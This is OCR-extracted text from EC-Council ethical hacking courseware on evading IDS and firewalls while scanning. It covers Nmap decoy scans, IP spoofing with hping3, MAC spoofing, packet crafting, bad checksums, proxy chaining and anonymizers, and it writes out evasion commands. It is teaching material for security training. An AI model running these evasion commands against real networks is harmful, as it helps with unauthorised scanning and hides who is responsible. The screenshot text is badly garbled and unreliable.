Decoy Scanning using Nmap Nmap has two options for decoy scanning: @ nmap -D RND:10 [target] (Generatesa random number of decoys) @ nmap
-D decoyl1,decoy2,decoy3,..
etc.
(Manually specify the IP addresses of the decoys)
IP Address Decoy The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls. It appears to the target that the decoys as well as the host(s) are scanning the network. This technique makes it difficult for the IDS/firewall to determine which IP address is actually scanning the network and which IP addresses are decoys. The Nmap scanning tool comes with a built-in scan function called a decoy scan, which cloaks a scan with decoys. This technique generates multiple IP addresses to perform a scan, thus making it difficult for the target security mechanisms such as IDS, firewalls, etc., to identify the original source from the registered logs. The target IDS might report scanning from 5— 0 IP addresses; however, it cannot differentiate between the actual scanning IP address and the innocuous decoy IPs.
You can perform two types of decoy scans using Nmap: =
nmap -D RND:10 [target] Using this command, Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IPs. Ex. Assume that 10.10.10.10 is the target IP address to be scanned. Thus, the Nmap decoy scan command will be: #
nmap
Module 03 Page 353
-D
RND:
10
10.10.10.10
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
© Zenmap Scan Tools Profile Help Target:
-
10.10.1.11
vy)
Profile:
v|
o
x
|Scan) | Cancel
Command: | nmap -D RND: 10.10.1.11 Hosts | OS 4 Host @
Services
10.10.1.11
Nmap Output Ports /Hosts Topology Host Details Scans [nmap -D RND: 10.10.1.11 Starting f
Nmap
7.8@ ( https://nmap.org Time
)
at
v
2022-03-16
Details 02:37
Nmap scan report for 10.10.1.11 Host is up (@.0@s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address: @0:15:5D:01:80:00 (Microsoft) Filter Hosts
Nmap done:
1 IP address
(1 host up) scanned in 1.52 seconds
Figure 3.86: Decoy using Nmap RND option
=
nmap -D decoy1,decoy2,decoy3,...,ME,... [target]
Using this command, you can manually specify the IP addresses of the decoys to scan the victim’s network. Here, you have to separate each decoy IP with a comma (,) and you can optionally use the ME command to position your real IP in the decoy list. If you place ME in the 4‘" position of the command, your real IP will be positioned at the 4'” position accordingly. This is an optional command, and if you do not mention ME in your scan command, then Nmap will automatically place your real IP in any random position. For example, assume that 10.10.1.19 is the real source IP and 10.10.1.11 is the target IP
address to be scanned. Then, the Nmap decoy command will be: Syntax:
# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.1.19,10.10.1.5 10.10.1.11
Module 03 Page 354
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
-
® Zenmap
Scan Tools Profile Target:
o
x
Help
v | Profile:
10.10.1.11
v
Cancel
Command:
Hosts OS
Services
4 Host
@
10.10.1.11
4
Nmap Output Ports /Hosts Topology Host Details Scans |nmap -D 192.168.0.1,172.120.2.8, 192.168.2.8, 10.10.1.19,10.10.1.5 1. |v
Details
Starting Nmap 7.80 ( https://nmap.org ) at 2022-@3-16 @2:49 fami) MEE Time Nmap scan report for 10.10.1.11 Host is up (@.00s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp
open
microsoft-ds
3389/tcp open ms-wbt-server MAC Address: @@:15:5D:@1:80:0@ (Microsoft) Filter Hosts
Nmap done:
1 IP address (1 host up) scanned in 1.80 seconds
Figure 3.87: Decoy using Nmap with manual decoy list
These decoys can be generated in both initial ping scans such as ICMP, SYN, ACK, etc., and during the actual port scanning phase. IP address decoy is a useful technique for hiding your IP address. However, it will not be successful if the target employs active mechanisms such as router path tracing, response dropping, etc. Moreover, using many decoys can slow down the scanning process and affect the accuracy of the scan.
Module 03 Page 355
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
IP Address Spoofing
CE H
@ IP spoofing refers to changing the source IP addressesso that the attack appears to be coming from someone else @ When the victim repliesto the address, it goes back to the spoofed address rather than the attacker's real address |@ Attackers modifythe address information in theIP packet header and the source address bits field in orderto bypass the IDS or firewall IP spoofing using Hping3: Hping3 www. certifiedhacker.com -a 7.7.7.7 Attacker sending a packet with a spoofed address 7.7.7.7
IP Address Spoofing Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use IP spoofing technique to bypass such IDS/firewalls. IP address spoofing is a hijacking technique in which an attacker obtains a computer’s IP address, alters the packet headers, and sends request packets to a target machine, pretending to be a legitimate host. The packets appear to be sent from a legitimate machine but are actually sent from the attacker’s machine, while his/her machine's IP address is concealed. When the victim replies to the address, it goes back to the spoofed address and not to the attacker’s real address. Attackers mostly use IP address spoofing to perform DoS attacks. When the attacker sends a connection request to the target host, the target host replies to the spoofed IP address. When spoofing a nonexistent address, the target replies to a nonexistent system and then hangs until the session times out, thus consuming a significant amount of its
own resources.
Module 03 Page 356
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Hping3 www.certifiedhacker.com
‘¢
IP spoofing using Hping3:
-a 7.7.7.7
Attacker sending a packet with a spoofed address 7.7.7.7 Victim IP address 5.5.5.5 Real address VDT Figure 3.88: IP Spoofing using Hping3
IP spoofing using Hping3: Hping3
www.certifiedhacker.com
-a
7.7.7.7
You can use Hping3 to perform IP spoofing. The above command TCP/IP packets to network hosts.
helps you to send arbitrary
Note: You will not be able to complete the three-way handshake and open a successful TCP connection with spoofed IP addresses.
Module 03 Page 357
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
MAC Address Spoofing |@ The MAC address spoofing technique involves spoofing a MAC address with the MAC address of a legitimate user on the network.
@ Attackers use the --spoof-mac Nmap option to set a specific MAC address for the packets to evade firewalls.
Al RightsReserved. Reproduction
MAC Address Spoofing Network firewalls filter packets based on the source media access control (MAC) address. They examine the MAC address in the packet header and determine whether the packets originate from a legitimate source. Firewalls allow traffic from specific sources using MAC filtering rules and restrict packets that do not satisfy the filtering rules. To avoid these restrictions, attackers use MAC spoofing techniques, in which they employ fake MAC addresses and masquerade as legitimate users to scan the hosts located behind the firewall. The MAC address spoofing technique allows attackers to send request packets to the target machine/network, pretending to be a legitimate host. Attackers use the Nmap tool to evade firewalls via MAC address spoofing. Performing MAC Address Spoofing to Scan Beyond IDS and Firewall Using Nmap: Attackers use the --spoof-mac Nmap option to choose or set a specific MAC address for packets and send them to the target system/network. =
nmap
-sT
-Pn
--spoof-mac
0
[Target
IP]
The above command automatically generates a random MAC address and attaches it to the packets in place of the original MAC address while performing host scanning. Here, -spoof-mac 0 represents the randomization of the MAC address.
Module 03 Page 358
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
oof-mac
0 10.10.1.11
-
rot Terminal
ffnmap -sT -Pn --spoof-mac 0 10.10.1.11 Starting Nmap 7.92 _( https://nmap.org ) at 2022-03-16 02:56 EDT Bpooting MAC address DF:FB:47:17:14:72 (No registered vendor) You have specified some options that require raw socket access. These options will not be honored for TCP Connect scan. Nmap scan report for 10.10.1.11 Host is up (0.039s latency). Not_shown:
994
closed
PORT 21/tcp
STATE open
SERVICE ftp
135/tcp
open
msrpc
80/tcp
open open open
3389/tcp
Nmap done:
open
tcp
ports
(conn-refused)
http
netbios-ssn
microsoft-ds
ms-wbt-server
1 IP address me @parrot
(1 host up) .
scanned
in 0.57 seconds
Figure 3.89: Screenshot of scanning using the Nmap -spoof-mac 0 option =
nmap
-sT
-Pn
--spoof-mac
[Vendor]
[Target
IP]
The above command allows attackers to opt for a MAC address from the vendor and spoof it by attaching it to the packets in place of the original MAC address during the scan. This type of scan allows attackers to scan in the hidden mode, as the original MAC address is not recorded in the firewall logs. --spoof-mac [vendor] represents the randomization of the MAC address based on the specified vendor.
File
Edit
View
@parrot
#nmap
Starting Spoofing
You
These
Nmap Host
-sT
Search
Termin
-Pn
poof-mac
Help
e
specified
options
will
some not
options
be
honored
scan report for 10.10.1.11 is up (@.044s latency).
INot_shown:
994
STATE
open open open open open B389/tcp open
Nmap done:
Dell
10.10.1.11|
Nmap 7.92 (_https://nmap.org MAC address 00:00:97:82:FE:32
have
closed
SERVICE
tcp
- Parrot Termina
10.10.1.11
poof-mac Dell
nmap
ee
ports
that
for
)
at _ 2022-03-16 (Dell EMC)
require TCP
raw
Connect
02:58
socket scan.
EDT
access.
(conn-refused)
ftp http msrpc netbios-ssn microsoft-ds _ms-wbt-server
1 IP address rot
(1 host up) scanned
in 0.58 seconds
Figure 3.90: Scanning using the Nmap —spoof-mac [Vendor] option Module 03 Page 359
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks =
nmap
-sT
-Pn
Exam 312-50 Certified Ethical Hacker
--spoof-mac
[new
MAC]
[Target
IP]
The above command allows attackers to manually choose or set a new MAC address for the packets sent during the scanning process. --spoof-mac [new MAC] represents manually setting the MAC address.
Figure 3.91: Scanning using the Nmap —spoof-mac [new MAC] option
Module 03 Page 360
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Creating Custom Packets
CEH
Creating Custom Packets by using Packet Crafting Tools \@ Attackers create custom TCP packets using various packet crafting tools like Colasoft Packet Builder, NetScanTools Pro, etc. to
scan a target beyonda
firewall
Copyright © by
Al Rights
‘ete //uww.colasof.com Reserved. Reproduction is Strictly Prohibited
Creating Custom Packets The attacker creates and sends custom packets to scan the IDS/firewalls. Various techniques are used to create custom mentioned below: =
intended target beyond packets. Some of them
the are
Creating Custom Packets by using Packet Crafting Tools Attackers create custom TCP packets to scan the target by bypassing the firewalls. Attackers use various packet crafting tools such as Colasoft packet builder (https://www.colasoft.com), NetScanTools Pro (https://www.netscantools.com), etc., to scan the target that is beyond the firewall. Packet crafting tools craft and send packet streams (custom packets) using different protocols at different transfer rates.
o
Colasoft Packet Builder Source: https://www.colasoft.com Colasoft Packet Builder is a tool that allows an attacker to create custom network packets and helps security professionals assess the network. The attacker can select aTCP packet from the provided templates and change the parameters in the decoder, hexadecimal, or ASCII editor to create a packet. In addition to building packets, Colasoft Packet Builder supports saving packets to packet files and sending packets to the network.
Module 03 Page 361
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
@ Colasoft Packet Builder
Bile Edit Send Help
x @\¢¢\o @ Exports Import | Add. Insert Copy Paste Dulte (Decode Editor Sy Packet Info eooeei ee
@ Sender Ip Acre WP rereet @ Terset Ip ai 2 Extra Dai
w/e 2 Adapter €¢i)eSend Send/AI| Checksum | About PacketNo. 1 (IPGL
eo @.100000000 Second FFF :FRIPRSFFSFF 20:00:00:20:00:0@ (5/9) exeos [ets 1 exe0e 6 1 aia 20:00:00:00:00:00 @.0.0.0 [25/4] 00:00:00:00:00:00 2.0.0.0. [38 38 bytes 142 exeFECI760
No.
Delta Time
Source
Packets | 1 | Selected | 1 Destination
RR] Da FFA 100200 OB O000000
Figure 3.92: Screenshot of Colasoft Packet Builder
There are three views in the Packet Builder: Packet List, Decode Editor, and Hex Editor. e
Packet List displays all the constructed packets. When you select one or more packets in Packet List, the first highlighted packet is displayed in both Decode Editor and Hex Editor for editing.
e
In Hex Editor, the data of the packet are represented as hexadecimal values and ASCII characters; nonprintable characters are represented by a dot (".") in the ASCII section. You can edit either the hexadecimal values or the ASCII characters.
e
Decode Editor allows the attacker to edit packets without remembering the value length, byte order, and offsets. You can select a field and change the value in the
edit box.
For creating a packet, you can use the add or insert packet command in the Edit menu or the Toolbar to create a new packet. The attacker can send a constructed packet to wire directly and control how Colasoft Packet Builder sends the packets, specifying, for example, the interval between packets, loop times, and delay between loops. This packet builder audits networks and checks the network protection against attacks and intruders. Attackers may use this packet builder to create fragmented packets to bypass network firewalls and IDS systems. They can also create packets and flood the victim with a very large number of packets, which could result in DoS attacks. Module 03 Page 362
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Randomizing Host Order and Sending Bad Checksums Randomizing Host Order
Sending Bad Checksums
@ Attackers scan the number of hosts in the target
@ Attackers send packets with bad or bogus
network in random order to scan an intended target that is behind a firewall
= Zenap Scan Took Pofie Help Yager [1030.1
D] roe:
a
TCP/UPD checksums to the intended target to avoid certain firewall rulesets
x
>] ka]
Serves | Nmap Output Pons/ Host Topology Host Deas Scans 05 « Host [map ~andomize-hrs 1230331 =] F [Deie = rao.
C | EH
Starting tmap 7.80 ( nttps://nmap.ore ) at 2022-03-16
> Zenmap Seen Took Bolle Help Yager [103031
D] roe:
o
x
>] Ea]
Serves | Nmap Output Pons/ Host: Topology Host Deas Scans 05 + test [ap bade 01081 Z] & [Detie = rao.
Nesp done: 1 IP sddress (1 host up) scanned in 23.00 (Serosort)
Fite Hoss
(2 host up) > scanned in 1.36
Fier Hoss
ttps:/famep.org A igh
Randomizing Host Order and Sending Bad Checksums Randomizing Host Order The attacker scans the number of hosts in the target network in a random order to scan the intended target that is lying beyond the firewall. The option used by Nmap to scan with a random host order is --randomize-hosts. This technique instructs Nmap to shuffle each group of 16384 hosts before scanning with slow timing options, thus making the scan less notable to network monitoring systems and firewalls. If larger group sizes are randomized, the PING_GROUP_Sz should be increased in nmap.h and it should be compiled again. Another method can be followed by generating the target IP list with the list scan command -sL -n -oN and then randomizing it with a Perl script and providing the whole list to Nmap using the -iL command.
Module 03 Page 363
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
© Zenmap Scan Tools Profile Help Target: | 10.10.1.11
Commane
Hosts || Services OS ¢ Host =
v)
Profile:
v|
a |Scan)
Nmap Output Ports /Hosts Topology Host Details Scans nmap --randomize-hosts 10.10.1.11 v
10.10.1.11
Starting Nmap 05:34 MUL.
7.88 ( ouyelge
https://nmap.org Time
) at
x [Cancel
Details
2022-03-16
Nmap scan report for 10.10.1.11 Host is up (@.@@s latency).
Not shown: 994 PORT STATE
21/tcp 80/tcp
open open
135/tcp 139/tcp 445/tcp 3389/tcp
open open open open
MAC Address:
closed ports SERVICE
ftp http
msrpc netbios-ssn microsoft-ds ms-wbt-server
@8:15:5D:@1:80:@@
(Microsoft)
Nmap done: 1 IP address (1 host up) scanned in 1.36
Filter Hosts
v
.
Figure 3.93: Screenshot of randomizing hosts in Zenmap
Sending Bad Checksums The attacker sends packets with bad or bogus TCP/UPD checksums to the intended target to avoid certain firewall rule sets. TCP/UPD checksums are used to ensure data integrity. Sending packets with incorrect checksums can help attackers to acquire information from improperly configured systems by checking for any response. If there is a response, then it is from the IDS or firewall, which did not verify the obtained checksum. If there is no response or the packets are dropped, then it can be inferred that the system is configured. This technique instructs Nmap to send packets with invalid TCP, UDP, or SCTP checksums to the target host. The option used by Nmap is --badsum.
© Zenmap Scan Tools Profile Help Target: 10.10.1.11
v|
Profile:
v|
o
x
[Scan] | Cencel
Command: | nmap --badsum 10.10.1.11 Hosts || Services OS 4 Host 10.10.11
4
Nmap Output Ports / Hosts Topology Host Details Scans Details v nmap --badsum 10.10.1.11 Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-16 05:39 DML. MOY_DQME Time Nmap scan report for 10.10.1.11 Host is up (@.@@s latency).
All 10@@ scanned ports on 10.10.1.11 are filtered MAC Address: 0@:15:50:01:80:00 (Microsoft) Nmap done: 1 IP address seconds
(1 host up) scanned in 23.00
Figure 3.94: Screenshot of scanning by sending bad checksums in Zenmap
Module 03 Page 364
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Proxy Servers
CE H
A proxy server is an application that can serve as an intermediary for connecting with other computers (1)
To hide the actual source of a scan and evade certain IDS/firewall restrictions
(2) To mask the actual source of an attack by impersonating the fake source address of the proxy Why Attackers
Use Proxy
(3) To remotely access intranets and other website resources that are normally restricted
Servers?
To interruptall requests sentby a user and transmit them to a third destination such that victims can only identify the proxy server address
e
To chain multiple proxy servers to avoid detection
Note: A search in Google will list thousands of free proxy servers Proxy Servers A proxy server is an application that can serve as an intermediary for connecting with other
computers.
A proxy server is used: =
Asa
firewall and to protect the local network from external attacks.
=
As an IP address multiplexer that allows several computers to connect to the Internet when you have only one IP address (NAT/PAT).
=
To anonymize web surfing (to some extent).
=
To extract unwanted proxy servers).
=
To provide some protection against hacking attacks.
=
To save bandwidth.
content, such as ads or “unsuitable” material (using specialized
How does a proxy server work? Initially, when you use a proxy to request a particular web page on an actual server, the proxy server receives it. The proxy server then sends your request to the actual server on your behalf. It mediates between you and the actual server to transmit and respond to the request, as shown in the figure below.
Module 03 Page 365
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
Proxy Server
*..
Target Organization
—
Attacker
Figure 3.95: Attacker using a proxy server for connecting to the target
In this process, the proxy receives the communication between the client and the destination application. To take advantage of a proxy server, an attacker must configure client programs so that they can send their requests to the proxy server instead of the final destination. Why Attackers Use Proxy Servers? It is easier for an attacker to attack or hack a particular system than to conceal the attack source. Therefore, the primary challenge for an attacker is to hide his/her identity so that he/she cannot be traced. Thus, the attacker uses a proxy server to avoid attack detection by masking his/her IP address. When the attacker uses a proxy to connect to the target system, the server logs will record the proxy's source address rather than the attacker’s source address. Proxy sites help the attacker to browse the Internet anonymously and access blocked sites (i.e., evade firewall restrictions). Thus, the attacker can surf restricted sites anonymously without using the source IP address. Attackers use proxy servers: =
To hide the actual source of a scan and evade certain IDS/firewall restrictions.
=
To hide the source IP address so that they can hack without any legal corollary.
=
To mask the actual source of the attack by employing a fake source address of the proxy.
=
To remotely access intranets and other website resources that are normally off limits.
=
To interrupt all the requests sent by a user and transmit them to a third destination; hence, victims will only be able to identify the proxy server address.
=
To chain multiple proxy servers to avoid detection.
Module 03 Page 366
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Free Proxy Servers
Some free proxy servers available on the Internet, which can help you to access restricted sites without revealing your IP address. In the Google search engine, type “Free Proxy Servers" to see a list of such servers. Select one from this list and download and install it to browse anonymously without revealing your legitimate IP address. vy
G free proxy servers - Google Sear Xe
©
1
& goosle.com/search?q=free+ proxy +servers&iog= free proxyservesBiaqs=chrome.6515701512195325,.
Be QAll
@)Videos
Q
=
@
@
t
&
& (2)
x 4a BNews
images
© Shopping:
More
‘About 86,500,000 results (0.81 seconds)
8 Browsing i Servers in 2022
bttps:/ivpnoverview.com >...» Anot A List of Free Proxy
FreeProxy
(Individual Proxies)
‘Software
‘Are you looking fora free proxy server in 2022? Check out our list of free proxy servers to improve your privacy and freedom online! What is a proxy server?
Why would | use a proxy? https:lispys.one > Proxy list, free proxy servers list online, hide your IP address . . Free proxy list Http, ssl, socks proxy servers for free. Fresh public proxy servers lists to unblock your intemet. Realtime updated live proxies. Free proxy list - US United States » Proxy list by country HTTP proxy list https:ligeonode.com > free-proxy-list Free Proxy List P Port County ORG &ASN Protocol An. 190.71.97.115 5678 COCO EPM Telecomunicaciones SA E.S.P (ASB... socks4 elite 143.249.1168 8888 USUS — Zenlayer Inc (AS21859) socks4 elite 218.64.1293 5678 CNCN NIA(AS4134) socks4 elite View 47 more rows
FreeProxy, which runs on Microsoft Windows platforms, was originally developed in 1999 as a ‘method of intemet connection sharing. Since that time ithas been continuously developed and now offers a ‘number of internet services. The software is free but not available under the GNU General Public License Wikipedia Developer(s): Hand-Crafted Software License: Freeware People also search for d W
Privoxy
HI
—_hide.me VPN
¢
. )
NordVPN Feedback
Figure 3.96: Free Proxy Servers
Module 03 Page 367
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Proxy Chaining
|
| @
User requestsa resource from the destination
| ©
Proxy client at the user’s system connects to a proxy server and passes the request to proxy server
|} ©
the proxy server strips the user's identification information and passes the request to next proxy server
| @
this processis repeated by all the proxy servers in the chain
| ©
Atthe end, the unencrypted request is passed to the web server
» a User
|
1: 20.10.10.2, Port: 8012
1: 10.10.20.5, Port: 8023
1: 20.10.54 Port: 8030
Port: 8054
Port: 8035
Port: 8028
Proxy Chaining Proxy chaining helps an attacker to increase his/her Internet anonymity. Internet anonymity depends on the number of proxies used for fetching the target application; the larger the number
of proxy servers used, the greater is the attacker’s anonymity. The proxy chaining process is described below:
=
The user requests a resource from the destination.
=
A proxy client in the user’s system connects to a proxy server and passes the request to the proxy server.
=
The proxy server strips the user’s identification information and passes the request to the next proxy server.
=
This process is repeated by all the proxy servers in the chain.
=
Finally, the unencrypted request is passed to the web server.
User
IP: 20.10.10.2 Port: 8012
cs IP: 20.15.15.3 Port: 8054
IP: 10.10.20.5 Port: 8023
Encrypted/unencrypted traffic
Bs
IP: 15.20.15.2 Port: 8045
Bh pepe By
1: 10.20.10.8 Port: 8028
traffic
a) Web Server
Figure 3.97: Proxy Chaining
Module 03 Page 368
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Proxy Tools Proxy Switcher
CE H
Proxy Switcher allows you to surf
|
anonymously on the Internet without disclosing your IP address Bava saa
7s
CyberGhost VPN hides your IP and
| CyberGhost | replacesit with one of your choice, thus | | veN allowing you to surf anonymously |
_—
x
|
Al servers
.
CyberGhostVPN
@
coe
] Other Proxy Tools:
Burp Suite
es/tewmeperswigernet
>
o
>
6
>
@
,
.
Ts wn rw che om Tor
e
——_—‘tps/wmtargoieccorg
ccProxy
——_‘tps//meyungzsofet
res fn eros com
Hotspot Shield
ti:
tsps com
|
Proxy Tools Proxy tools are intended to allow users to surf the Internet anonymously by keeping their IP hidden through a chain of SOCKS or HTTP proxies. These tools can also act as HTTP, mail, FTP, SOCKS, news, telnet, and HTTPS proxy servers.
Module 03 Page 369
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Proxy Switcher Source: https://www.proxyswitcher.com
Proxy Switcher allows attackers to surf the Internet anonymously without disclosing their IP address. It also helps attackers to access various blocked sites in the organization. In addition, it avoids all sorts of limitations imposed by target sites. [Bi Proxy Switcher Unregistered (Direct Connection )
File Edit Actions View Help
7 Ex
GOS EE7 Server
5\ 9." State
Figure 3.98: Screenshot of Proxy Switcher
Module 03 Page 370
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
=
Exam 312-50 Certified Ethical Hacker
CyberGhost VPN Source: https://www.cyberghostvpn.com CyberGhost VPN hides the attacker's IP and replaces it with a selected IP, allowing him or her to surf anonymously and access blocked or censored content. It encrypts the connection and does not keep logs, thus securing data. All servers Name
Distance
Load
CyberGhost VPN
Favorite
‘Albania
> we
>
‘Ss
Argentina
Figure 3.99: Screenshot of CyberGhost
In addition to the proxy tools mentioned above, there are many other proxy tools intended to allow users to surf the Internet anonymously. Some additional proxy tools are listed below:
=
Burp Suite (https://www.portswigger.net)
=
Tor (https://www.torproject.org)
=
CCProxy (https://www.youngzsoft.net)
=
Hotspot Shield (https://www.hotspotshield.com)
Module 03 Page 371
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Proxy Tools for Mobile =
Shadowsocks Source: https://shadowsocks.org Shadowsocks is a high-performance, cross-platform secured socks5 proxy. It adopts bleeding-edge techniques with asynchronous I/O and event-driven programming. This tool is available on multiple platforms, including PC, MAC, mobile devices (Android and iOS), and routers (OpenWRT). It is a low-resource-consumption tool that is suitable for low-end boxes and embedded devices. It supports open-source implementations in python, node.js, golang, C#, and pure C. Shadowsocks help attackers to surf the Internet privately and securely. can't Fd & 06:00
shadowsocks
&
Global Settings Profiles Switchto another profile or add new profiles Network Traffic Internet Sent: Receive
le. (latency: 1841ms)
Server Settings Profile Name Placeholder Server example.com Remote Port £8388 (port number of the remot Local Port 1080 (port number of the local server) Password
Figure 3.100: Screenshot of Shadowsocks
Some additional proxy tools for mobile are listed below:
=
ProxyDroid (https://github.com)
=
Proxy Manager (https://play.google.com)
=
CyberGhost VPN (https://www.cyberghostvpn.com)
=
Servers Ultimate (https://icecoldapps.com)
Module 03 Page 372
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Anonymizers @ Ananonymizer removes all identity information from the user’s computer while the user surfs the Internet @ Anonymizers make activity on the Internet untraceable
CE H Whonix
Whonixis a desktop operatingsystem | designed for advanced securityand privacy
@ Anonymizers allow you to bypass Internet censors Why use an Anonymizer? @
Privacy and anonymity
©
Protection against online attacks
©
Access restricted content
@
Bypass IDS and Firewall rules
"tas Jor won
Anonymizers An anonymiczer is an intermediate server placed between an end user and a website that accesses the website on their behalf and makes web surfing activities untraceable. Anonymizers allow users to bypass Internet censorship. An anonymizer eliminates all identifying information (IP address) from the system while surfing the Internet, thereby ensuring privacy. It encrypts the data transferred from a computer to the Internet service provider (ISP). Most anonymizers can anonymize web (HTTP:), File Transfer Protocol (FTP:), and gopher (gopher:) Internet services. To visit a page anonymously, you can visit your preferred anonymizer site and enter the name of the target website in the anonymization field. Alternatively, you can set your browser home page to point to an anonymizer to anonymize subsequent web access. In addition, you can choose to anonymously provide passwords and other information to sites without revealing any additional information, such as your IP address. Attackers may configure an anonymizer as a permanent proxy server by making the site name the setting for the HTTP, FTP, Gopher, and other proxy options in their application configuration menu, thereby cloaking their malicious activities.
Why Use an Anonymizer? The reasons for using anonymizers include: =
Ensuring privacy: Protect your identity by making your web navigation activities untraceable. Your privacy is maintained until and unless you disclose your personal information on the web, for example, by filling out forms.
=
Accessing government-restricted content: Most governments prevent their citizens from accessing certain websites or content deemed inappropriate or sensitive. However, these sites can still be accessed using an anonymizer located outside the target country.
Module 03 Page 373
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks =
Exam 312-50 Certified Ethical Hacker
Protection against online attacks: An anonymizer can protect you from all instances of online pharming attacks by routing all customer Internet traffic via its protected DNS
server. =
Bypassing IDS and firewall rules: Firewalls are typically bypassed by employees or students accessing websites that they are not supposed to access. An anonymizer service gets around your organization’s firewall by setting up a connection between your computer and the anonymizer service. Thus, firewalls see only the connection from your computer to the anonymizer’s web address. The anonymizer will subsequently connect to any website (e.g., Twitter) with the help of an Internet connection and then direct the content back to you. To your organization, your system appears to be simply connected to the anonymizer’s web address but not to the actual site that you are browsing.
In addition to protecting users' identities, anonymizers can also be used to attack a website without being traced. Types of Anonymizers
Anonymizers are of two basic types: networked anonymizers and single-point anonymizers. =
Networked Anonymizers A networked anonymizer first transfers your information through a network of Internetconnected computers before passing it on to the website. Because the information passes through several Internet computers, it becomes cumbersome for anyone trying to track your information to establish the connection between you and the anonymizer. Example: If you want to visit any web page, you have to make a request. The request will first pass through A, B, and C Internet computers before going to the website. Advantage: Complication of the communications makes traffic analysis complex. Disadvantage: Any multi-node network communication compromising confidentiality at each node.
=
incurs some
degree of risk of
Single-Point Anonymizers Single-point anonymizers first transfer your information through a website before sending it to the target website and then pass back the information gathered from the target website to you via the website to protect your identity. Advantage: Arms-length information.
communication
hides the IP address
and
related
identifying
Disadvantage: It offers less resistance to sophisticated traffic analysis. Anonymizer tools use various techniques such as SSH, VPN, and HTTP proxies, which allow access to blocked or censored content on the Internet with advertisements omitted.
Module 03 Page 374
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks =
Whonix Source: https://www.whonix.org Whonix is a desktop OS designed for advanced security and privacy. It mitigates the threat of common attack vectors while maintaining usability. Online anonymity is realized via fail-safe, automatic, and desktop-wide use of the Tor network. It consists of a heavily reconfigured Debian base that is run inside multiple virtual machines, providing a substantial layer of protection from malware and IP address leaks.
C)
Edit_view History Bookmarks
Ble
o>
‘you using Tor?
@ B [0 vcheckantoinden
——_—
}
—
